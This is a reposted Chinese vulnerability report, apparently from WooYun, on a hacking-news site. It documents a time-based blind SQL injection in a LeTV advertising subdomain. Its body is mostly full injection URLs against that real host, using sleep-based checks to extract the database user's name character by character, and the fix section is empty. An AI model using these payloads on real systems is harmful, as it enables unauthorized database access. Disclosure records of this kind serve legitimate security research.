记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

乐视某站延时SQL注入

2015-08-22 22:35

http://ad.hz.letv.com/phpapi/tp/tp_tab_add.php?callback=?&tpid=1



注入点:

tpid

漏洞证明:

猜解user()长度

1

http://ad.hz.letv.com/phpapi/tp/tp_tab_add.php?callback=?&tpid=1' and if((ORD(MID((length(user())),1,1))=49 and sleep(3)),1,(select 1 union select 2)) and '1'='1



6

http://ad.hz.letv.com/phpapi/tp/tp_tab_add.php?callback=?&tpid=1' and if((ORD(MID((length(user())),2,1))=54 and sleep(3)),1,(select 1 union select 2)) and '1'='1





猜解user()

a

http://ad.hz.letv.com/phpapi/tp/tp_tab_add.php?callback=?&tpid=1' and if((ORD(MID((user()),1,1))=97 and sleep(3)),1,(select 1 union select 2)) and '1'='1



d

http://ad.hz.letv.com/phpapi/tp/tp_tab_add.php?callback=?&tpid=1' and if((ORD(MID((user()),2,1))=100 and sleep(3)),1,(select 1 union select 2)) and '1'='1







修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0125212

阅读:78027 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“乐视某站延时SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词